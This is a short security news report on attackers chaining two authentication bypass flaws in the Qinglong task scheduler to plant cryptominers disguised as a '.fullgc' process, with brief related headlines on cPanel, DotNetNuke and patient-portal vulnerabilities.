Vulnerability Management , Patch/Configuration Management Hackers exploit Qinglong vulnerabilities to deploy cryptominers May 1, 2026 Share By SC Staff (Adobe Stock) As reported by Bleeping Computer, hackers are actively exploiting two authentication bypass vulnerabilities in the popular open-source task scheduling tool Qinglong to deploy cryptominers on developers' servers. The exploitation began in early February, prior to the public disclosure of the security flaws at the end of the month. The vulnerabilities, identified as CVE-2026-3965 and CVE-2026-4047, affect Qinglong versions 2.20.1 and older. They can be chained together to achieve remote code execution. The flaws stem from a mismatch between the security middleware's assumptions and the Express.js routing behavior, allowing attackers to bypass authentication. Attackers have been targeting publicly exposed Qinglong panels since February 7, modifying the config.sh file to download and execute a cryptominer disguised as a hidden process named ".fullgc". This process consumes significant CPU resources, mimicking an innocuous but intensive system process to evade detection. The downloaded miner variants support multiple architectures, including Linux x86_64, ARM64, and macOS. While Qinglong maintainers released an update, the initial fix was insufficient, with a more effective patch addressing the authentication bypass arriving later. The ongoing exploitation highlights the risks associated with unpatched open-source software. Source: Bleeping Computer SC Staff Related Security Operations Practice by Numbers fixes patient data exposure bug SC Staff May 1, 2026 A patient, Joseph R. Cox, discovered the vulnerability, which allowed any user with portal access to view other patients' documents, including personal information, medical histories, and photo identification. Vulnerability Management Critical cPanel vulnerability actively exploited in the wild SC Staff April 30, 2026 The vulnerability stems from a Carriage Return Line Feed (CRLF) injection flaw within the login and session loading processes of cPanel & WHM. Vulnerability Management DotNetNuke CMS vulnerability allows server compromise via malicious SVG uploads SC Staff April 30, 2026 The flaw, CVE-2026-40321, affects the popular open-source platform built on Microsoft technology. Get daily email updates SC Media's daily must-read of the most current and pressing daily news Business Email By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy . Subscribe Related Terms Bug Buffer Overflow Disassembly You can skip this ad in 5 seconds